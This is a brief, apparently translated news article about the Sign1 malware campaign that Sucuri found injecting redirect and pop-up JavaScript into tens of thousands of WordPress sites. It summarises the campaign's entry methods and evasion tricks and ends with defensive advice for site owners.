Hackers have been observed installing a brand new piece malware on vulnerable WordPress sites.
The malware, called Sign1, redirects visitors to dangerous websites and displays pop-up advertisements that owners never intended to display.
The discovery was made earlier this week by cybersecurity researchers Sucuri, after a customer said his website was misbehaving. BleepingComputer reports.
Multiple blackout methods
According to Sucuri’s report, the client’s website was brute-forced, with unnamed hackers trying numerous username and password combinations until they found one that worked. Then, instead of modifying the WordPress files (which is standard practice for WordPress-related attacks, it seems), the threat actors injected the malware into custom HTML widgets and plugins, or installed Simple Custom CSS and JS plugins to add the JavaScript code. code to the site.
Further investigation revealed that more than 39,000 websites were infected with the same malware. Sucuri isn’t sure how other websites were hacked, but speculates that the attackers used a combination of brute force and exploitation of vulnerabilities in various plugins and themes.
Sign1 also has a number of methods to avoid being noticed.
For starters, it uses time-based randomization, generating dynamic URLs that change every 10 minutes. In this way, the malware ensures that the domains are always up to date and are not added to block lists.
Second, the domains are hosted on HETZNER and Cloudflare, making both hosting and IP addresses unclear. Finally, the injected code comes with XOR encoding and random variable names, making detection even more difficult.
The campaign has been running for about six months, the researchers concluded, adding that the malware is in active development. Every time the developers release a new version, the infections increase.
The latest attack began in January 2024 and has resulted in approximately 2,500 compromised websites to date.
To stay safe, the researchers advise website owners to ensure their username/password combination is strong enough not to be hit by brute-force attacks. Any unused or unnecessary plugins and themes should also be removed, as they can give attackers unrestricted access to the premises.